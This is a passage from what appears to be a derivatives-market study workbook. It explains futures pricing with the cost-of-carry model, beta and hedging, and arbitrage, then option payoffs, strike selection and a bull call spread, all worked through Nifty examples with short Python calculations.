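If the quoted futures price drifts away from this fair value, an arbitrager can buy the cheaper leg and sell the dearer one, which is the mechanism that pushes the price back, as described above.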
3.8.2 Pricing index futures given expected dividend amount
The pricing of index futures is based on the cost-of-carry model, where the carrying cost is the cost of financing the purchase of the portfolio underlying the index, minus the present value of dividends obtained from the stocks in the index portfolio. This has been illustrated in the example below.
Example: Nifty futures trade on NSE as one, two and three-month contracts. Money can be borrowed at a rate of 10% per annum. What will be the price of a new two-month futures contract on Nifty?
1. Let us assume that ABC Ltd. will be declaring a dividend of Rs. 20 per share after 15 days of purchasing the contract.
2. Current value of Nifty is 4000 and Nifty trades with a multiplier of 100.
3. Since Nifty is traded in multiples of 100, the value of the contract is 100 x 4000 = Rs. 400,000.
4. If ABC Ltd. has a weight of 7% in Nifty, its value in Nifty is Rs. 28,000, i.e. (400,000 x 0.07).
5. If the market price of ABC Ltd. is Rs. 140, then a traded unit of Nifty involves 200 shares of ABC Ltd., i.e. (28,000/140).
6. To calculate the futures price, we need to reduce the cost-of-carry to the extent of dividend received. The amount of dividend received is Rs. 4000, i.e. (200 x 20). The dividend is received 15 days later and hence compounded only for the remainder of 45 days.
7. To compute the amount of dividend received per unit of Nifty, we divide the compounded dividend figure by 100, giving Rs. 40 per unit. Thus, the futures price is calculated as F = 4000e^(0.1 x 60/365) - 40e^(0.1 x 45/365).

3.8.3 Pricing index futures given expected dividend yield
If the dividend flow throughout the year is generally uniform, i.e. if there are few historical cases of clustering of dividends in any particular month, it is useful to calculate the annual dividend yield. In that case the futures price is calculated as:

F = Se^((r-q)T)

where:
F    futures price
S    spot index value
r    cost of financing
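The steps above can be strung together directly. Note that the final figure below is computed from the steps, since the workbook's own total is not quoted in this extract:

```python
import math

# Step-by-step pricing of the two-month Nifty futures with an expected dividend.
contract_value = 100 * 4000                 # Nifty 4000, multiplier 100 -> Rs. 400,000
abc_value = contract_value * 0.07           # ABC's 7% weight -> Rs. 28,000
abc_shares = abc_value / 140                # at Rs. 140 a share -> 200 shares per contract
dividend_per_contract = abc_shares * 20     # Rs. 20 per share -> Rs. 4,000
dividend_per_nifty_unit = dividend_per_contract / 100   # Rs. 40 per unit of Nifty

r = 0.10
# Dividend arrives after 15 days, so it compounds for the remaining 45 days.
F = 4000 * math.exp(r * 60 / 365) - dividend_per_nifty_unit * math.exp(r * 45 / 365)
print(round(F, 2))  # about Rs. 4025.8
```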
q    expected dividend yield
T    holding period

Example: A two-month futures contract trades on the NSE. The cost of financing is 10% and the dividend yield on Nifty is 2% annualized. The spot value of Nifty is 4000. What is the fair value of the futures contract?

Fair value = 4000e^((0.1 - 0.02) x (60/365)) = Rs. 4052.95

The cost-of-carry model explicitly defines the relationship between the futures price and the related spot price. As we know, the difference between the spot price and the futures price is called the basis.
Nuances:
• As the date of expiration comes near, the basis reduces; there is a convergence of the futures price towards the spot price. On the date of expiration, the basis is zero. If it is not, then there is an arbitrage opportunity.
• Arbitrage opportunities can also arise when the basis (difference between spot and futures price) or the spreads (difference between prices of two futures contracts) during the life of a contract are incorrect. At a later stage we shall look at how these arbitrage opportunities can be exploited.

Figure 3.3: Variation of basis over time
The figure 3.3 above shows how basis changes over time. As the time to expiration of a contract reduces, the basis reduces. Towards the close of trading on the day of settlement, the futures price and the spot price converge. The closing price for the June 28 futures contract is the closing value of Nifty on that day.
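The dividend-yield variant reproduces the Rs. 4052.95 figure above (a sketch; the function name is mine):

```python
import math

def index_futures_price(spot: float, r: float, q: float, t_years: float) -> float:
    """F = S * e^((r - q) * T): cost of financing net of the dividend yield."""
    return spot * math.exp((r - q) * t_years)

# Nifty at 4000, 10% financing, 2% dividend yield, two months to expiry.
f = index_futures_price(4000, 0.10, 0.02, 60 / 365)
print(round(f, 2))  # Rs. 4052.95, matching the worked example
```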
3.9 Pricing Stock Futures
A futures contract on a stock gives its owner the right and obligation to buy or sell the stocks. Like index futures, stock futures are also cash settled; there is no delivery of the underlying stocks. Just as in the case of index futures, the main differences between commodity and stock futures are that:
• There are no costs of storage involved in holding stock.
• Stocks come with a dividend stream, which is a negative cost if you are long the stock and a positive cost if you are short the stock.
Therefore, Cost of carry = Financing cost - Dividends. Thus, a crucial aspect of dealing with stock futures as opposed to commodity futures is an accurate forecasting of dividends. The better the forecast of dividend offered by a security, the better is the estimate of the futures price.

3.9.1 Pricing stock futures when no dividend expected
The pricing of stock futures is also based on the cost-of-carry model, where the carrying cost is the cost of financing the purchase of the stock, minus the present value of dividends obtained from the stock. If no dividends are expected during the life of the contract, pricing futures on that stock simply involves multiplying the spot price by the cost of carry. It has been illustrated in the example given below:
XYZ Ltd.'s futures trade on NSE as one, two and three-month contracts. Money can be borrowed at 10% per annum. What will be the price of a unit of new two-month futures contract on XYZ Ltd. if no dividends are expected during the two-month period?
1. Assume that the spot price of XYZ Ltd. is Rs. 228.
2. Thus, futures price F = 228e^(0.1 x 60/365) = Rs. 231.78 (approximately).

3.9.2 Pricing stock futures when dividends are expected
When dividends are expected during the life of the futures contract, pricing involves reducing the cost of carry to the extent of the dividends. The net carrying cost is the cost of financing the purchase of the stock, minus the present value of dividends obtained from the stock. This is explained in the illustration below:
XYZ Ltd. futures trade on NSE as one, two and three-month contracts. What will be the price of a unit of new two-month futures contract on XYZ Ltd. if dividends are expected during the two-month period?
1. Let us assume that XYZ Ltd. will be declaring a dividend of Rs. 10 per share after 15 days of purchasing the contract.
2. Assume that the market price of XYZ Ltd. is Rs. 140.
3. To calculate the futures price, we need to reduce the cost-of-carry to the extent of dividend received. The amount of dividend received is Rs. 10.
4. The dividend is received 15 days later and hence compounded only for the remainder of 45 days.
Thus, futures price F = 140e^(0.1 x 60/365) - 10e^(0.1 x 45/365) = Rs. 132.20
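Both stock-futures cases reduce to one small function (a sketch; passing a zero dividend gives the no-dividend case):

```python
import math

def stock_futures_price(spot, r, t_days, dividend=0.0, div_remaining_days=0):
    """F = S*e^(r*T), minus any expected dividend compounded for the days
    remaining between its receipt and expiry (dividend=0 -> plain cost of carry)."""
    f = spot * math.exp(r * t_days / 365)
    if dividend:
        f -= dividend * math.exp(r * div_remaining_days / 365)
    return f

# No dividend: XYZ spot 228, 10% financing, two months.
print(round(stock_futures_price(228, 0.10, 60), 2))           # about 231.78
# Rs. 10 dividend after 15 days (45 days left to expiry), spot 140.
print(round(stock_futures_price(140, 0.10, 60, 10, 45), 2))   # Rs. 132.20
```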
CHAPTER 4: Application of Futures Contracts
This chapter begins with a brief introduction of the concept of Beta (β), which indicates the sensitivity of an individual stock's or portfolio's return to the returns on the market index. Thereafter, hedging strategies using individual stock futures are discussed in detail through numerical illustrations and payoff profiles.

4.1 Understanding Beta (β)
Beta measures a stock's responsiveness to market factors. Generally, it is seen that when markets rise, most stock prices rise, and vice versa. Beta measures how much a stock would rise or fall if the market rises/falls. The market is indicated by the index, say Nifty 50, and the index has a beta of one.
A stock with a beta of 1.5 will rise/fall by 1.5% when the Nifty 50 rises/falls by 1%. That is, for every 1% movement in the Nifty, the stock will move by 1.5% (β = 1.5) in the same direction as the index. A stock with a beta of -1.5 will rise/fall by 1.5% when the Nifty 50 falls/rises by 1%. That is, for every 1% movement in the Nifty, the stock will move by 1.5% (β = -1.5) in the opposite direction of the index.
Beta of a portfolio measures the portfolio's responsiveness to market movements. In practice, given individual stock betas, calculating portfolio beta is simple: it is nothing but the weighted average of the stock betas. A portfolio with a beta of two responds more sharply to index movements. If the index moves up by 10 percent, the value of a portfolio with a beta of two will move up by 20 percent; if the index drops by 10 percent, it will fall by 20 percent. Similarly, if a portfolio has a beta of 0.75, a 10 percent movement in the index will cause a 7.5 percent movement in the value of the portfolio: if the index moves up by 10 percent, the portfolio value will increase by 7.5 percent, and if the index drops by 5 percent, the portfolio value will drop by 3.75 percent.

4.2 Numerical illustration of Applications of Stock Futures
4.2.1 Hedging: Long security, sell futures
Futures can be used as a risk-management tool. For example, an investor who holds the shares of a company sees the value of his security falling from Rs. 450 to Rs. 390. In the absence of stock futures, he would either suffer the discomfort of a price fall or sell the security in anticipation of a market upheaval. With security futures he can minimize his price risk. All he needs to do is enter into an offsetting stock futures position, in this case, take on a short futures position. Assume that the spot price of the security he holds is Rs. 390 and that two-month futures cost him Rs. 402. For this he pays an initial margin. Now if the price of the security falls any further, he will suffer losses on the security he holds. However, the losses he suffers on the security will be offset by the profits he makes on his short futures position.
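Portfolio beta as a weighted average, plus the usual beta-based sizing of an index-futures hedge, can be sketched as follows (the hedge-sizing rule is the standard one, not a formula quoted from this chapter):

```python
def portfolio_beta(weights, betas):
    """Weighted average of individual stock betas; weights should sum to 1."""
    return sum(w * b for w, b in zip(weights, betas))

def contracts_to_short(portfolio_value, beta, futures_price, multiplier):
    """Number of index futures contracts to short to offset market exposure."""
    return round(portfolio_value * beta / (futures_price * multiplier))

# Two stocks held 50% each, with betas 1.0 and 2.0 -> portfolio beta 1.5
print(portfolio_beta([0.5, 0.5], [1.0, 2.0]))        # 1.5
# Rs. 9,00,000 portfolio with beta 1.2, Nifty futures at 4000, multiplier 100
print(contracts_to_short(900_000, 1.2, 4000, 100))   # 3 contracts
```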
Take for instance that the price of his security falls to Rs. 350. The fall in the price of the security will result in a fall in the price of futures. Futures will now trade at a price lower than the price at which he entered into his short futures position. Hence his short futures position will start making profits. The loss of Rs. 40 incurred on the security he holds will be made up by the profits made on his short futures position.

4.2.2 Speculation: Bullish security, buy futures
Take the case of a speculator who has a view on the direction of the market. He believes that a particular security that trades at Rs. 1000 is undervalued and expects its price to go up in the next two-three months. How can he trade based on this belief? In the absence of a deferral product, he would have to buy the security and hold on to it. Assume that he buys 100 shares which cost him one lakh rupees. His hunch proves correct and two months later the security closes at Rs. 1010. He makes a profit of Rs. 1000 on an investment of Rs. 1,00,000 for a period of two months. This works out to an annual return of 6 percent.
Today a speculator can take exactly the same position on the security by using futures contracts. Let us see how this works. The security trades at Rs. 1000 and the two-month futures trades at 1006. Just for the sake of comparison, assume that the minimum contract value is Rs. 1,00,000. He buys 100 security futures for which he pays a margin of Rs. 20,000. Two months later the security closes at 1010. On the day of expiration, the futures price converges to the spot price and he makes a profit of Rs. 400 on an investment of Rs. 20,000. This works out to an annual return of 12 percent. Because of the leverage they provide, security futures form an attractive option for speculators.

4.2.3 Speculation: Bearish security, sell futures
Stock futures can be used by a speculator who believes that a particular security is overvalued and is likely to see a fall in price. How can he trade based on his opinion? In the absence of a deferral product, there wasn't much he could do to profit from his opinion. Today all he needs to do is sell stock futures. Let us understand how this works.
Simple arbitrage ensures that futures on an individual security move correspondingly with the underlying security, as long as there is sufficient liquidity in the market for the security. If the security price rises, so will the futures price; if the security price falls, so will the futures price. Now take the case of the trader who expects to see a fall in the price of ABC Ltd. He sells one two-month contract of futures on ABC at Rs. 240 (each contract for 100 underlying shares); this works out to be Rs. 24,000. He pays a small margin on the same. Two months later, when the futures contract expires, ABC closes at 220. On the day of expiration, the spot and the futures price converge. He has made a clean profit of Rs. 20 per share. For the one contract that he sold, this works out to be Rs. 2000.
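The 6 percent versus 12 percent comparison above comes from the same simple pro-rata annualization; a sketch (the helper function is mine):

```python
def annualized_return_pct(profit, outlay, months):
    """Simple pro-rata annualization of a holding-period return, in percent."""
    return profit / outlay * (12 / months) * 100

# Cash market: Rs. 1000 profit on Rs. 1,00,000 over two months
print(annualized_return_pct(1000, 100_000, 2))   # about 6 percent a year
# Futures: Rs. 400 profit on Rs. 20,000 margin over two months
print(annualized_return_pct(400, 20_000, 2))     # about 12 percent a year
```

The futures trader earns less in rupee terms but doubles the annualized return, because only the margin is tied up; this is the leverage effect the text describes.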
4.2.4 Arbitrage: Overpriced futures: buy spot, sell futures
As we discussed earlier, the cost-of-carry ensures that the futures price stays in tune with the spot price. Whenever the futures price deviates substantially from its fair value, arbitrage opportunities arise. If you notice that futures on a security you have been observing seem overpriced, how can you cash in on this opportunity to earn riskless profits? Say for instance, ABC Ltd. trades at Rs. 1000 and one-month ABC futures trade at Rs. 1025 and seem overpriced. As an arbitrageur, you can make riskless profit by entering into the following set of transactions.
1. On day one, borrow funds and buy the security on the cash/spot market at 1000.
2. Simultaneously, sell the futures on the security at 1025.
3. Take delivery of the security purchased and hold the security for a month.
4. On the futures expiration date, the spot and the futures price converge. Now unwind the position.
5. Say the security closes at Rs. 1015. Sell the security.
6. The futures position expires with a profit of Rs. 10.
7. The result is a riskless profit of Rs. 15 on the spot position and Rs. 10 on the futures position.
8. Return the borrowed funds.
If the cost of borrowing funds to buy the security is less than the arbitrage profit possible, it makes sense for you to arbitrage. In the real world, one has to build in the transactions costs into the arbitrage strategy.

4.2.5 Arbitrage: Underpriced futures: buy futures, sell spot
Whenever the futures price deviates substantially from its fair value, arbitrage opportunities arise. It could be the case that you notice the futures on a security you hold seem underpriced. How can you cash in on this opportunity to earn riskless profits? Say for instance, ABC Ltd. trades at Rs. 1000 and one-month ABC futures trade at Rs. 965 and seem underpriced. As an arbitrageur, you can make riskless profit by entering into the following set of transactions.
1. On day one, sell the security in the cash/spot market at 1000.
2. Make delivery of the security.
3. Simultaneously, buy the futures on the security at 965.
4. On the futures expiration date, the spot and the futures price converge. Now unwind the position.
5. Say the security closes at Rs. 975. Buy back the security.
6. The futures position expires with a profit of Rs. 10.
7. The result is a riskless profit of Rs. 25 on the spot position and Rs. 10 on the futures position.
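The unwind arithmetic in both lists can be checked mechanically (a sketch using the Rs. 1015 and Rs. 975 settlement prices from the examples):

```python
def cash_and_carry(spot_buy, futures_sell, settlement):
    """Buy spot, sell overpriced futures; both legs unwound at settlement."""
    spot_pnl = settlement - spot_buy
    futures_pnl = futures_sell - settlement
    return spot_pnl, futures_pnl, spot_pnl + futures_pnl

def reverse_cash_and_carry(spot_sell, futures_buy, settlement):
    """Sell spot, buy underpriced futures; both legs unwound at settlement."""
    spot_pnl = spot_sell - settlement
    futures_pnl = settlement - futures_buy
    return spot_pnl, futures_pnl, spot_pnl + futures_pnl

print(cash_and_carry(1000, 1025, 1015))          # (15, 10, 25)
print(reverse_cash_and_carry(1000, 965, 975))    # (25, 10, 35)
```

Note that the total profit equals the initial gap between the futures and spot prices, whatever the settlement price turns out to be; that is why the trade is riskless (before financing and transaction costs).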
If the returns you get by investing in riskless instruments are more than the return from the arbitrage trades, it makes sense for you to invest in the riskless instrument instead. This second strategy is termed reverse-cash-and-carry arbitrage. It is this arbitrage activity that ensures that the spot and futures prices stay in line with the cost-of-carry. As we can see, exploiting arbitrage involves trading on the spot market. As more and more players in the market develop the knowledge and skills to do cash-and-carry and reverse cash-and-carry, we will see increased volumes and lower spreads in both the cash as well as the derivatives market.

4.3 Hedging Using Stock Index Futures
Broadly there are two types of risks (as shown in the figure below) and hedging is used to minimize these risks.
Suppose an investor holds shares of a steel company and has no other investments. Any change in government policy would affect the price of steel and the company's share price. This is considered as Unsystematic Risk. This risk can be reduced through appropriate diversification: the investor can buy stocks of different industries so that the price change of any one stock does not affect his portfolio. Unsystematic risk is also called Company Specific Risk or Diversifiable Risk.
However, diversification does not reduce risk in the overall portfolio completely. Diversification reduces unsystematic risk, but there remains a risk associated with the overall market returns, which is called the Systematic Risk or Market Risk or Non-diversifiable Risk. It is that risk which cannot be reduced through diversification. Generally, a falling overall market would see most stocks falling (and vice versa). The market is denoted by the index: a fall in the index (say Nifty 50) in a day sees most of the stock prices fall. Therefore, even if the investor has a diversified portfolio of stocks, the portfolio value is likely to fall if the market falls. This is due to the inherent market risk in the portfolio, the market-specific risk that diversification cannot remove. Hedging using Stock Index Futures or Single Stock Futures is one way to reduce this risk.
Hedging can be done in two ways by an investor who has an exposure to the underlying stock(s):

4.3.1 By Selling Index Futures
On March 12, 2010, an investor buys 3100 shares of Hindustan Lever Limited (HLL) @ Rs. 290 per share (approximate portfolio value of Rs. 9,00,000). However, the investor fears that the market will fall and thus needs to hedge. He uses Nifty March Futures to hedge.
5.2 Comparison between Futures and Options
Options are different from futures in several interesting senses. At a practical level, the option buyer faces an interesting situation: he pays for the option in full at the time it is purchased. After this, he only has an upside. There is no possibility of the options position generating any further losses to him (other than the funds already paid for the option). This is different from futures, which are free to enter into but can generate very large losses. This characteristic makes options attractive to many occasional market participants, who cannot put in the time to closely monitor their futures positions. Buying put options is buying insurance. To buy a put option on Nifty is to buy insurance which reimburses the full extent to which Nifty drops below the strike price of the put option. This is attractive to many people, and to mutual funds creating "guaranteed return products".
More generally, options offer "nonlinear payoffs" whereas futures only have "linear payoffs". By combining futures and options, a wide variety of innovative and useful payoff structures can be created. Table 5.1 presents the comparison between futures and options.

Table 5.1: Comparison between Futures and Options
Futures                            | Options
Exchange traded, with novation     | Same as futures
Exchange defines the product       | Same as futures
Price is zero, strike price moves  | Strike price is fixed, price moves
Price is zero                      | Price is always positive
Linear payoff                      | Nonlinear payoff
Both long and short at risk        | Only short at risk

5.3 Options Payoffs
The optionality characteristic of options results in a non-linear payoff for options. In simple words, it means that the losses for the buyer of an option are limited; however, the profits are potentially unlimited. For a writer, the payoff is exactly the opposite: his profits are limited to the option premium, and his losses are potentially unlimited. These non-linear payoffs are fascinating as they lend themselves to be used to generate various payoffs by using combinations of options and the underlying. We look here at the six basic payoffs.

5.3.1 Payoff profile of buyer of asset: Long asset
In this basic position, an investor buys the underlying asset, Nifty for instance, for 2220, and sells it at a future date at an unknown price, St. Once it is purchased, the investor is said to be "long" the asset. Figure 5.1 shows the payoff for a long position on the Nifty.
Figure 5.1: Payoff for investor who went Long Nifty at 2220
The figure 5.1 shows the profits/losses from a long position on the index. The investor bought the index at 2220. If the index goes up, there are profits; if the index falls, there are losses.

5.3.2 Payoff profile for seller of asset: Short asset
In this basic position, an investor shorts the underlying asset, Nifty for instance, for 2220, and buys it back at a future date at an unknown price, St. Once it is sold, the investor is said to be "short" the asset. Figure 5.2 shows the payoff for a short position on the Nifty.

Figure 5.2: Payoff for investor who went Short Nifty at 2220
The figure 5.2 shows the profits/losses from a short position on the index. The investor sold the index at 2220. If the index falls, he makes a profit; if the index rises, he makes losses.

5.3.3 Payoff profile for buyer of call options: Long call
A call option gives the buyer the right to buy the underlying asset at the strike price specified in the option. The profit/loss that the buyer makes on the option depends on the spot price of the underlying. If upon expiration the spot price exceeds the strike price, he makes a profit; the higher the spot price, the more is the profit. If the spot price of the underlying is less than the strike price, the option expires un-exercised, and the loss in this case is the premium paid for buying the option.
Figure 5.3: Payoff for buyer of call option
The figure 5.3 gives the payoff for the buyer of a three-month call option (often referred to as long call) with a strike of 2250 bought at a premium of 86.60. As can be seen, as the spot Nifty rises, the call option is in-the-money. If upon expiration Nifty closes above the strike of 2250, the buyer would exercise his option and profit to the extent of the difference between the Nifty-close and the strike price. The profits possible on this option are potentially unlimited. However, if Nifty falls below the strike of 2250, he lets the option expire; the losses are limited to the extent of the premium paid for buying the option.

5.3.4 Payoff profile for writer of call options: Short call
A call option gives the buyer the right to buy the underlying asset at the strike price specified in the option. For selling the option, the writer of the option charges a premium. Whatever is the buyer's profit is the seller's loss. If upon expiration the spot price exceeds the strike price, the buyer will exercise the option on the writer. Hence as the spot price increases, the writer of the option starts making losses; the higher the spot price, the more are the losses. If upon expiration the spot price of the underlying is less than the strike price, the buyer lets his option expire un-exercised and the writer gets to keep the premium. Figure 5.4 gives the payoff for the writer of a three-month call option (often referred to as short call) with a strike of 2250 sold at a premium of 86.60.
Figure 5.4: Payoff for writer of call option
The figure 5.4 shows the profits/losses for the seller of a three-month Nifty 2250 call option. As the spot Nifty rises, the call option is in-the-money and the writer starts making losses. If upon expiration Nifty closes above the strike of 2250, the buyer would exercise his option on the writer, who would suffer a loss to the extent of the difference between the Nifty-close and the strike price. The loss that can be incurred by the writer of the option is potentially unlimited, whereas the maximum profit is limited to the extent of the up-front option premium of Rs. 86.60 charged by him.

5.3.5 Payoff profile for buyer of put options: Long put
A put option gives the buyer the right to sell the underlying asset at the strike price specified in the option. The profit/loss that the buyer makes on the option depends on the spot price of the underlying. If upon expiration the spot price is below the strike price, he makes a profit; the lower the spot price, the more is the profit. If upon expiration the spot price of the underlying is higher than the strike price, the option expires un-exercised, and his loss in this case is the premium he paid for buying the option. Figure 5.5 gives the payoff for the buyer of a three-month put option (often referred to as long put) with a strike of 2250 bought at a premium of 61.70.

Figure 5.5: Payoff for buyer of put option
The figure 5.5 shows the profits/losses for the buyer of a three-month Nifty 2250 put option. As can be seen, as the spot Nifty falls, the put option is in-the-money. If upon expiration Nifty closes below the strike of 2250, the buyer would exercise his option and profit to the extent of the difference between the strike price and Nifty-close. The profits possible on this option can be as high as the strike price. However, if Nifty rises above the strike of 2250, the option expires worthless; the losses are limited to the extent of the premium paid for buying the option.

5.3.6 Payoff profile for writer of put options: Short put
A put option gives the buyer the right to sell the underlying asset at the strike price specified in the option. For selling the option, the writer of the option charges a premium. Whatever is the buyer's profit is the seller's loss. If upon expiration the spot price happens to be below the strike price, the buyer will exercise the option on the writer. If upon expiration the spot price of the underlying is more than the strike price, the buyer lets his option go un-exercised and the writer gets to keep the premium. Figure 5.6 gives the payoff for the writer of a three-month put option (often referred to as short put) with a strike of 2250 sold at a premium of 61.70.

Figure 5.6: Payoff for writer of put option
The figure 5.6 shows the profits/losses for the seller of a three-month Nifty 2250 put option. As the spot Nifty falls, the put option is in-the-money and the writer starts making losses. If upon expiration Nifty closes below the strike of 2250, the buyer would exercise his option on the writer, who would suffer a loss to the extent of the difference between the strike price and Nifty-close.
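The six basic payoffs reduce to four option formulas plus the linear asset payoff. A sketch using the chapter's 2250-strike examples:

```python
def long_call(spot, strike, premium):
    """Buyer of a call: upside above the strike, loss capped at the premium."""
    return max(spot - strike, 0.0) - premium

def long_put(spot, strike, premium):
    """Buyer of a put: gains as spot falls below the strike, loss capped at premium."""
    return max(strike - spot, 0.0) - premium

def short_call(spot, strike, premium):
    """Writer of a call: mirror image of the buyer's payoff."""
    return -long_call(spot, strike, premium)

def short_put(spot, strike, premium):
    """Writer of a put: mirror image of the buyer's payoff."""
    return -long_put(spot, strike, premium)

# Nifty 2250 call bought at 86.60: profit only once spot clears the strike.
print(round(long_call(2400, 2250, 86.60), 2))   # 63.4
print(round(long_call(2100, 2250, 86.60), 2))   # -86.6 (loss capped at premium)
# Nifty 2250 put sold at 61.70: writer keeps the premium if spot stays above 2250.
print(round(short_put(2300, 2250, 61.70), 2))   # 61.7
```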
5.4 Application of Options
We look here at some applications of options contracts.

5.4.1 Hedging: Have underlying, buy puts
Owners of stocks or equity portfolios often experience discomfort about the overall stock market movement. At times one may witness massive volatility. The union budget is a common and reliable source of such volatility: market volatility is always enhanced for one week before and two weeks after a budget, and many investors simply do not want the fluctuations of these three weeks. As an owner of stocks or an equity portfolio, one way to protect your portfolio from potential downside due to a market drop is to buy insurance using put options.
Index and stock options are cheap and can be easily used to seek insurance from market ups and downs. The idea is simple: to protect the value of your portfolio from falling below a particular level, buy the right number of put options with the right strike price. If you are only concerned about the value of a particular stock that you hold, buy put options on that stock. If you are concerned about the overall portfolio, buy put options on the index. When the stock price falls, your stock will lose value and the put options bought by you will gain, effectively ensuring that the total value of your stock plus put does not fall below a particular level. This level depends on the strike price of the stock options chosen by you. Similarly, when the index falls, your portfolio will lose value and the put options bought by you will gain, effectively ensuring that the value of your portfolio does not fall below a particular level. This level depends on the strike price of the index options chosen by you. Since the index is nothing but a security whose price or level is a weighted average of the securities constituting the index, all strategies that can be implemented using stock options can also be implemented using index options. We refer to single stock options here.
Portfolio insurance using put options is of particular interest to mutual funds who already own well-diversified portfolios. By buying puts, the fund can limit its downside in case of a market fall.

5.4.2 Speculation: Bullish security, buy calls or sell puts
There are times when investors believe that security prices are going to rise; at other times one may have a view that stock prices will fall in the near future. How does one implement a trading strategy to benefit from an upward movement in the underlying security? Using options, there are two ways one can do this:
1. Buy call options; or
2. Sell put options
We have already seen the payoff of a call option. The downside to the buyer of the call option is limited to the option premium he pays for buying the option. His upside, however, is potentially unlimited. Suppose you have a hunch that the price of a particular security is going to rise.
Having decided to trade on your view, the obvious question is: which strike should you choose? Let us take a look at options with different strike prices.

Illustration 5.2: One month calls and puts trading at different strikes
Assume that the current stock price is 1250, the risk-free rate is 12% per year and stock volatility is 30%. There are five one-month calls and five one-month puts trading in the market, each with a different strike price. The spot price is 1250.

Price | Strike price of option | Call Premium (Rs.) | Put Premium (Rs.)
1250  | 1200                   | 80.10              | 18.15
1250  | 1225                   | 63.65              | 26.50
1250  | 1250                   | 49.45              | 37.00
1250  | 1275                   | 37.50              | 49.80
1250  | 1300                   | 27.50              | 64.80

The call with a strike of 1200 is deep in-the-money and hence trades at a higher premium. The call with a strike of 1275 is out-of-the-money and trades at a low premium. The call with a strike of 1300 is deep-out-of-the-money; its purchase pays off only in the unlikely event that the stock rises by more than 50 points on the expiration date.

A person who instead expects prices to fall can write (sell) calls. You could write the following options:
1. A one month call with a strike of 1200.
2. A one month call with a strike of 1225.
3. A one month call with a strike of 1250.
4. A one month call with a strike of 1275.
5. A one month call with a strike of 1300.
Which of these options you write largely depends on how strongly you feel about the likelihood of the downward movement of prices and how much you are willing to lose should this downward movement not come about. Take the call with a strike of 1300, which is deep-out-of-the-money: there is a small probability that it may be in-the-money by expiration, in which case the buyer exercises and the writer suffers losses to the extent that the price is above 1300. In the more likely event of the call expiring out-of-the-money, the writer earns the premium amount of Rs. 27.50. Hence writing this call is a fairly safe bet.

Figure 5.9: Payoff for seller of call option at various strikes
The figure 5.9 shows the profits/losses for a seller of calls at various strike prices. The in-the-money option has the highest premium of Rs. 80.10 whereas the out-of-the-money option has the lowest premium of Rs. 27.50.

As a person who wants to speculate on the hunch that the market may fall, you can also buy puts. As the buyer of puts you face an unlimited upside but a limited downside. If the price does fall, you profit to the extent the price falls below the strike of the put purchased by you. If however your hunch about a downward movement in the market proves to be wrong and the price actually rises, all you lose is the option premium. If for instance the security price rises to 1300 and you've bought a put with an exercise of 1250, you simply let the put expire. If however the price does fall to say 1225 on expiration date, you make a neat profit of Rs. 25.
Having decided to buy a put, which one should you buy? Given that there are a number of one-month puts trading, each with a different strike price, the obvious question is: which strike should you choose? This largely depends on how strongly you feel about the likelihood of the downward movement in the market. If you buy an at-the-money put, the option premium paid by you will be higher than if you buy an out-of-the-money put; however, the chances of an at-the-money put expiring in-the-money are higher as well. The put with a strike of 1200 is deep out-of-the-money and will only be exercised in the unlikely event that the price falls by 50 points on the expiration date. Similarly, the put with a strike of 1300 is deep in-the-money and trades at a higher premium than the at-the-money put at a strike of 1250. The choice of which put to buy depends upon how much the speculator expects the market to fall. Figure 5.10 shows the payoffs from buying puts at different strikes.
5.4.4 Bull spreads - buy a call and sell another

There are times when you think the market is going to rise over the next two months; however, in the event that the market does not rise, you would like to limit your downside. One way you could do this is by entering into a spread. A spread trading strategy involves taking a position in two or more options of the same type, that is, two or more calls or two or more puts. A spread that is designed to profit if the price goes up is called a bull spread.

How does one go about doing this? This is basically done by utilizing two call options having the same expiration date but different exercise prices. The buyer of a bull spread buys a call with an exercise price below the current index level and sells a call option with an exercise price above the current index level. The trade is a spread because it involves buying one option and selling a related option; it is a bull spread because the trader hopes to profit from a rise in the index. Compared to buying the underlying asset itself, the bull spread with call options limits the trader's risk, but it also limits the profit potential. In short, it limits both the upside potential and the downside risk.

Broadly, we can have three types of bull spreads:
1. Both calls initially out-of-the-money.
2. One call initially in-the-money and one call initially out-of-the-money.
3. Both calls initially in-the-money.
The decision about which of the three spreads to undertake depends upon how much risk the investor is willing to take. The most aggressive bull spreads are of type 1: they cost very little to set up, but have a very small probability of giving a high payoff.

Figure 5.11: Payoff for a bull spread created using call options. The figure shows the profits/losses for a bull spread built from two calls, one bought at Rs.80 (strike 3800) and the other sold at Rs.40 (strike 4200). The cost of the bull spread is the cost of the option that is purchased less the cost of the option that is sold, i.e. the call premium paid (Rs.80) minus the call premium received (Rs.40), which is Rs.40. The downside on the position is limited to this amount; this is the maximum loss that the position will make. As the index moves above 3800, the position starts making profits (cutting losses) until the index reaches 4200. Beyond an index level of 4200, any profits made on the long call position are cancelled by losses made on the short call position, effectively limiting the profit on the combination: the maximum profit on this spread, Rs.360, is made if the index on the expiration day closes at or above 4200. The payoff obtained is the sum of the payoffs of the two calls and hence lies between -40 and +360.

Somebody who thinks the index is going to rise, but not above 4200, would buy this spread: he does not want to buy a call at 3800 and pay a premium of 80 for an upside he believes will not happen.

Illustration 5.2 gives the profit/loss incurred on the spread position as the index changes. Illustration 5.3 shows the possible expiration-day cash flows for a bull spread created by buying two-month calls at a strike of 3800 and selling calls at a strike of 4200.
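The arithmetic of this 3800/4200 spread can be checked with a short sketch. Illustrative only; the strikes and premiums are the ones from the example above, passed in as default arguments.

```python
def bull_spread_profit(index_at_expiry,
                       k_low=3800.0, k_high=4200.0,
                       premium_paid=80.0, premium_received=40.0):
    """Expiration-day profit of a bull call spread: long the k_low call,
    short the k_high call. Net premium outflow is paid minus received."""
    long_call = max(index_at_expiry - k_low, 0.0)      # payoff of the call bought
    short_call = -max(index_at_expiry - k_high, 0.0)   # payoff of the call sold
    return long_call + short_call - (premium_paid - premium_received)
```

Below 3800 the profit is pinned at -40 (the net premium), and at or above 4200 it is pinned at +360, matching the description of Illustration 5.3.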
Illustration 5.3: Expiration day cash flows for a bull spread using two-month calls (long 3800 call bought at Rs.80, short 4200 call sold at Rs.40; net premium Rs.40):

Index at expiry | Payoff, long 3800 call | Payoff, short 4200 call | Net payoff | Profit
3700 | 0 | 0 | 0 | -40
3750 | 0 | 0 | 0 | -40
3800 | 0 | 0 | 0 | -40
3850 | 50 | 0 | 50 | +10
3900 | 100 | 0 | 100 | +60
3950 | 150 | 0 | 150 | +110
4000 | 200 | 0 | 200 | +160
4050 | 250 | 0 | 250 | +210
4100 | 300 | 0 | 300 | +260
4150 | 350 | 0 | 350 | +310
4200 | 400 | 0 | 400 | +360
4250 | 450 | -50 | 400 | +360
4300 | 500 | -100 | 400 | +360

